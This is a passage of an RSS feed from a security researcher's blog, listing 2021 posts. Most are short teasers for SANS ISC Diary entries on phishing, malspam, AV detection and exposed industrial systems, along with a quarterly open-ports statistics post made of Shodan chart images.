As always, you may find the current version here.</description>
        <content:encoded>&lt;p&gt;Since the online malware sandbox landscape has changed somewhat over the last six months, I have updated my list of most useful sandboxes to reflect these changes. One improvement that deserves a special mention was a significant increase in number of supported operating systems by the &lt;a href=&#34;https://tria.ge/&#34;&gt;Hatching Triage&lt;/a&gt; platform&amp;hellip;&lt;/p&gt;
&lt;p&gt;As always, you may find the current version &lt;a href=&#34;https://www.untrustednetwork.net/en/sandboxes/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/misc/free-malware-analysis-sandboxes-overview-1.7.png&#34; alt=&#34;Overview of free online malware analysis sandboxes – 8/2021&#34; style=&#34;width:700px; border:1px solid grey&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/misc/free-malware-analysis-sandboxes-overview-1.7.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Malware</category>
            
          
            
              <category>Sandbox</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - A sextortion e-mail from...IT support?!</title>
        <link>https://untrustednetwork.net/en/2021/07/28/sextortion_from_it/</link>
        <pubDate>Wed, 28 Jul 2021 08:35:00 +0200</pubDate>
        
        <atom:modified>Wed, 28 Jul 2021 08:35:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/07/28/sextortion_from_it/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a slightly unusual sextortion phishing, in which its author claimed to work for an IT service company hired by recipients e-mail provider&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27682&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a slightly unusual sextortion phishing, in which its author claimed to work for an IT service company hired by recipients e-mail provider&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Sextortion</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - One way to fail at malspam - give recipients the wrong password for an encrypted attachment </title>
        <link>https://untrustednetwork.net/en/2021/07/14/malspam_fail/</link>
        <pubDate>Wed, 14 Jul 2021 13:10:00 +0200</pubDate>
        
        <atom:modified>Wed, 14 Jul 2021 13:10:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/07/14/malspam_fail/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a malspam campaign, whose authors failed to include a correct password to decrypt the malicious attachment&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27634&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a malspam campaign, whose authors failed to include a correct password to decrypt the malicious attachment&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Malspam</category>
            
          
            
              <category>Encryption</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Open ports statistics for Q2 2021</title>
        <link>https://untrustednetwork.net/en/2021/06/30/open_ports_q2_2021/</link>
        <pubDate>Wed, 30 Jun 2021 21:15:00 +0200</pubDate>
        
        <atom:modified>Wed, 30 Jun 2021 21:15:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/06/30/open_ports_q2_2021/</guid>
        <description>The first half of 2020 is behind us, which means it&amp;rsquo;s time for a look at how the internet as a whole changed during the past 3 months.
As always, the data, on which the following charts are based, have been gathered using Shodan. Therefore bear in mind that although the charts should give us a good enough view of more significant changes, they may not be completely accurate (see the first post with quarterly statistics.</description>
        <content:encoded>&lt;p&gt;The first half of 2020 is behind us, which means it&amp;rsquo;s time for a look at how the internet as a whole changed during the past 3 months.&lt;/p&gt;
&lt;p&gt;As always, the data, on which the following charts are based, have been gathered using &lt;a href=&#34;https://www.shodan.io/&#34;&gt;Shodan&lt;/a&gt;. Therefore bear in mind that although the charts should give us a good enough view of more significant changes, they may not be completely accurate (see the &lt;a href=&#34;https://untrustednetwork.net/en/2020/09/30/open-ports-statistics-for-q3-2020/&#34;&gt;first post with quarterly statistics&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Should you be interested in the port situation in the Czech Republic, you may find corresponding charts &lt;a href=&#34;https://untrustednetwork.net/cs/2021/06/30/open_ports_q2_2021/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Bellow, you may find charts for the following protocols and ports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#ssh&#34;&gt;SSH (port 22)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#telnet&#34;&gt;Telnet (port 23)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#dns&#34;&gt;DNS (port 53)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ntp&#34;&gt;NTP (port 123)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#snmp&#34;&gt;SNMP (port 161)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smb&#34;&gt;SMB (port 445)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#rdp&#34;&gt;RDP (port 3389)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hrefwebweba&#34;&gt;&lt;a href=&#34;#web&#34;&gt;Web&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#web&#34;&gt;HTTP (port 80)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#https&#34;&gt;HTTPS (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls13&#34;&gt;TLS 1.3 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls12&#34;&gt;TLS 1.2 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls11&#34;&gt;TLS 1.1 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls10&#34;&gt;TLS 1.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#hssl3&#34;&gt;SSL 3.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#hssl2&#34;&gt;SSL 2.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hrefemaile-maila&#34;&gt;&lt;a href=&#34;#email&#34;&gt;E-mail&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#smtp&#34;&gt;SMTP (port 25)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smtps&#34;&gt;SMTPS (port 465)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imap&#34;&gt;IMAP (port 143)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imaps&#34;&gt;IMAPS (port 993)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3&#34;&gt;POP3 (port 110)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3s&#34;&gt;POP3S (port 995)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hreftlsssltlsa&#34;&gt;&lt;a href=&#34;#tls&#34;&gt;SSL/TLS&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#tls13&#34;&gt;TLS 1.3 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls12&#34;&gt;TLS 1.2 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls11&#34;&gt;TLS 1.1 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls10&#34;&gt;TLS 1.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ssl3&#34;&gt;SSL 3.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ssl2&#34;&gt;SSL 2.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hreficsindustrial-control-systems-icsa&#34;&gt;&lt;a href=&#34;#ics&#34;&gt;Industrial Control Systems (ICS)&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#ics_all&#34;&gt;All ICS protocols&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#modbus&#34;&gt;Modbus (port 502)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#bacnet&#34;&gt;BACnet/IP (port 47808)&lt;br /&gt;
&lt;br&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h4 id=&#34;ssh&#34;&gt;SSH (port 22)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/ssh.png&#34; alt=&#34;SSH&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;telnet&#34;&gt;Telnet (port 23)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/telnet.png&#34; alt=&#34;Telnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;dns&#34;&gt;DNS (port 53)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/dns.png&#34; alt=&#34;DNS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ntp&#34;&gt;NTP (port 123)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/ntp.png&#34; alt=&#34;NTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;snmp&#34;&gt;SNMP (port 161)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/snmp.png&#34; alt=&#34;SNMP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smb&#34;&gt;SMB (port 445)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/smb.png&#34; alt=&#34;SMB&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;rdp&#34;&gt;RDP (port 3389)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/rdp.png&#34; alt=&#34;RDP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;web&#34;&gt;Web&lt;/h2&gt;
&lt;h4 id=&#34;http&#34;&gt;HTTP (port 80)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/http.png&#34; alt=&#34;HTTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;https&#34;&gt;HTTPS (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/https.png&#34; alt=&#34;HTTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls13&#34;&gt;TLS 1.3 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/htls13.png&#34; alt=&#34;HTTPS/TLS 1.3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls12&#34;&gt;TLS 1.2 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/htls12.png&#34; alt=&#34;HTTPS/TLS 1.2&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls11&#34;&gt;TLS 1.1 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/htls11.png&#34; alt=&#34;HTTPS/TLS 1.1&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls10&#34;&gt;TLS 1.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/htls10.png&#34; alt=&#34;HTTPS/TLS 1.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;hssl3&#34;&gt;SSL 3.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/hssl3.png&#34; alt=&#34;HTTPS/SSL 3.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;hssl2&#34;&gt;SSL 2.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/hssl2.png&#34; alt=&#34;HTTPS/SSL 2.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;email&#34;&gt;E-mail&lt;/h2&gt;
&lt;h4 id=&#34;smtp&#34;&gt;SMTP (port 25)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/smtp.png&#34; alt=&#34;SMTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smtps&#34;&gt;SMTPS (port 465)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/smtps.png&#34; alt=&#34;SMTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imap&#34;&gt;IMAP (port 143)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/imap.png&#34; alt=&#34;IMAP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imaps&#34;&gt;IMAPS (port 993)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/imaps.png&#34; alt=&#34;IMAPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3&#34;&gt;POP3 (port 110)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/pop3.png&#34; alt=&#34;POP3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3s&#34;&gt;POP3S (port 995)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/pop3s.png&#34; alt=&#34;POP3S&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;tls&#34;&gt;SSL/TLS&lt;/h2&gt;
&lt;h4 id=&#34;tls13&#34;&gt;TLS 1.3 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/tls13.png&#34; alt=&#34;HTTPS/TLS 1.3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls12&#34;&gt;TLS 1.2 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/tls12.png&#34; alt=&#34;HTTPS/TLS 1.2&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls11&#34;&gt;TLS 1.1 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/tls11.png&#34; alt=&#34;HTTPS/TLS 1.1&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls10&#34;&gt;TLS 1.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/tls10.png&#34; alt=&#34;HTTPS/TLS 1.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ssl3&#34;&gt;SSL 3.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/ssl3.png&#34; alt=&#34;HTTPS/SSL 3.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ssl2&#34;&gt;SSL 2.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/ssl2.png&#34; alt=&#34;HTTPS/SSL 2.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;ics&#34;&gt;Industrial Control Systems&lt;/h2&gt;
&lt;h4 id=&#34;ics_all&#34;&gt;All ICS protocols&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/ics.png&#34; alt=&#34;All ICS protocols&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;modbus&#34;&gt;Modbus (port 502)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/modbus.png&#34; alt=&#34;Modbus&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/eibnet.png&#34; alt=&#34;EIBnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;bacnet&#34;&gt;BACnet/IP (port 47808)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q2/bacnet.png&#34; alt=&#34;BACnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/ports/2021/q2/hssl2.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SSL</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>Telnet</category>
            
          
            
              <category>DNS</category>
            
          
            
              <category>NTP</category>
            
          
            
              <category>SNMP</category>
            
          
            
              <category>SMB</category>
            
          
            
              <category>RDP</category>
            
          
            
              <category>HTTP</category>
            
          
            
              <category>HTTPS</category>
            
          
            
              <category>SMTP</category>
            
          
            
              <category>SMTPS</category>
            
          
            
              <category>IMAP</category>
            
          
            
              <category>IMAPS</category>
            
          
            
              <category>POP3</category>
            
          
            
              <category>POP3S</category>
            
          
            
              <category>ICS</category>
            
          
            
              <category>Modbus</category>
            
          
            
              <category>EIBnet</category>
            
          
            
              <category>BACnet</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>Open port statistics</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing asking recipients not to report abuse</title>
        <link>https://untrustednetwork.net/en/2021/06/22/phishing_abuse/</link>
        <pubDate>Tue, 22 Jun 2021 15:15:00 +0200</pubDate>
        
        <atom:modified>Tue, 22 Jun 2021 15:15:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/06/22/phishing_abuse/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a phishing message that ended with an unusual request&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27556&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a phishing message that ended with an unusual request&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Architecture, compilers and black magic, or &#39;what else affects the ability of AVs to detect malicious files&#39;</title>
        <link>https://untrustednetwork.net/en/2021/06/09/compilers/</link>
        <pubDate>Wed, 09 Jun 2021 13:25:00 +0200</pubDate>
        
        <atom:modified>Wed, 09 Jun 2021 13:25:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/06/09/compilers/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at how the use of a compiler affects the ability of anti-malware tools to detect malicious code&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27510&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at how the use of a compiler affects the ability of anti-malware tools to detect malicious code&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - All your Base are...nearly equal when it comes to AV evasion, but 64-bit executables are not</title>
        <link>https://untrustednetwork.net/en/2021/05/27/all_your_base/</link>
        <pubDate>Thu, 27 May 2021 11:30:00 +0200</pubDate>
        
        <atom:modified>Thu, 27 May 2021 11:30:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/05/27/all_your_base/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the difference (or lack thereof) different binary-to-text encodings make when it comes to anti-malware evasion&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27466&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the difference (or lack thereof) different binary-to-text encodings make when it comes to anti-malware evasion&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Number of industrial control systems on the internet is lower then in 2020...but still far from zero</title>
        <link>https://untrustednetwork.net/en/2021/05/12/ics_on_internet/</link>
        <pubDate>Wed, 12 May 2021 13:15:00 +0200</pubDate>
        
        <atom:modified>Wed, 12 May 2021 13:15:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/05/12/ics_on_internet/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the number of Industrial Control Systems accessible from the internet&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27412&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the number of Industrial Control Systems accessible from the internet&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>ICS</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>Censys</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Hunting phishing websites with favicon hashes</title>
        <link>https://untrustednetwork.net/en/2021/04/19/favicon_hunting/</link>
        <pubDate>Mon, 19 Apr 2021 11:15:00 +0200</pubDate>
        
        <atom:modified>Mon, 19 Apr 2021 11:15:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/04/19/favicon_hunting/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at how HTTP favicon hashes may be used to identify IP addresses hosting phishing websites&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27326&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at how HTTP favicon hashes may be used to identify IP addresses hosting phishing websites&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>Hash</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Malspam with Lokibot vs. Outlook and RFCs</title>
        <link>https://untrustednetwork.net/en/2021/04/06/lokibot_outlook/</link>
        <pubDate>Tue, 06 Apr 2021 18:30:00 +0200</pubDate>
        
        <atom:modified>Tue, 06 Apr 2021 18:30:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/04/06/lokibot_outlook/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center website. In it, we&amp;rsquo;ll take a look at an interesting malspam message carrying the Lokibot infostealer and also causing quite unusual behavior in Outlook&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/diary/27282&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In it, we&amp;rsquo;ll take a look at an interesting malspam message carrying the Lokibot infostealer and also causing quite unusual behavior in Outlook&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Lokibot</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Outlook</category>
            
          
            
              <category>Malspam</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Open ports statistics for Q1 2021</title>
        <link>https://untrustednetwork.net/en/2021/04/05/open_ports_q1_2021/</link>
        <pubDate>Mon, 05 Apr 2021 11:30:00 +0200</pubDate>
        
